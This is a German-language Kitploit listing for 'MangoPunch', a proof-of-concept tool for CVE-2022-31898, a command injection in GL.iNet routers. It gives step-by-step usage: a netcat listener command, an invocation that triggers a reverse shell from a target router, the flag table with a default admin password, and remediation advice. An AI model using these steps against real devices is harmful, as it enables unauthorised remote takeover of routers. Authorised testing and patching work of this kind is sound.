Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/cryptoghost1/mangopunch-cve-2022-31898
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsCommand and ControlRed Teaming
GitHubcryptoghost1/mangopunch-cve-2022-31898

MangoPunch-CVE-2022-31898

Authentifiziertes Tool zur Befehlsinjektion (CVE-2022-31898) - HACKCONRD 2026.

Repository anzeigen
1vor 6 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

🥭 MangoPunch: CVE-2022-31898

Authentifizierte OS-Befehlsinjektion für GL.iNet-Geräte

Python CVE Security

root@kitploit:~
 __  __                         _____                 _     
|  \/  |                       |  __ \               | |    
| \  / | __ _ _ __   __ _  ___ | |__) |   _ _ __   ___| |__  
| |\/| |/ _` | '_ \ / _` |/ _ \|  ___/ | | | '_ \ / __| '_ \ 
| |  | | (_| | | | | (_| | (_) | |   | |_| | | | | (__| | | |
|_|  |_|\__,_|_| |_|\__, |\___/|_|    \__,_|_| |_|\___|_| |_|
                     __/ |                                   
                    |___/                                    

🔍 Überblick über die Schwachstelle

Dieses Repository enthält einen technischen Proof of Concept (PoC) für eine Remote Command Execution (RCE)-Schwachstelle, die in den GL.iNet MT300N-V2 (Mango) und anderen Modellen mit Firmware-Versionen unter 3.215 gefunden wurde.

Der Fehler besteht im Parameter ping_addr der Diagnose-API und ermöglicht es einem authentifizierten Angreifer, beliebige Systembefehle über Shell-Metazeichen (;) auszuführen.


🚀 Ausführungsanleitung

1. Bereiten Sie Ihren Listener vor

Öffnen Sie ein Terminal auf Ihrem Angreifer-Rechner (Kali Linux) und starten Sie einen Netcat-Listener:

root@kitploit:~
nc -lvnp 9292

2. Exploit ausführen

Verwenden Sie den folgenden Befehl, um die Reverse Shell auszulösen:

root@kitploit:~
python3 mangopunch.py -R <TARGET_IP> -L <YOUR_IP> -l <YOUR_LISTERNER_PORT> -p <PASSWORD>

🛠️ Skriptparameter

FlagVollständiger NameBeschreibungStandard
-R--rhostIP des entfernten Ziels (Router)Erforderlich
-P--rportWeb-Verwaltungsport443
-L--lhostListener-IP (Kali/Angreifer)Erforderlich
-l--lportListener-PortErforderlich
-p--pwdAdministrator-Passwortgoodlife
-t--httpsHTTPS aktivierenFalse

🛡️ Behebung

  • Firmware aktualisieren: Stellen Sie sicher, dass Ihr Gerät die Version 3.215 oder höher ausführt.
  • Eingabevalidierung: Entwickler sollten eine strenge Regex-Validierung für IP-/Hostname-Parameter implementieren und Shell-aufrufende Funktionen vermeiden, die Rohstrings an das Betriebssystem übergeben.

Haftungsausschluss: Dieses Tool dient ausschließlich Bildungs- und autorisierten Sicherheitstestzwecken. Der Autor ist nicht für missbräuchliche Verwendung verantwortlich.

Tool herunterladen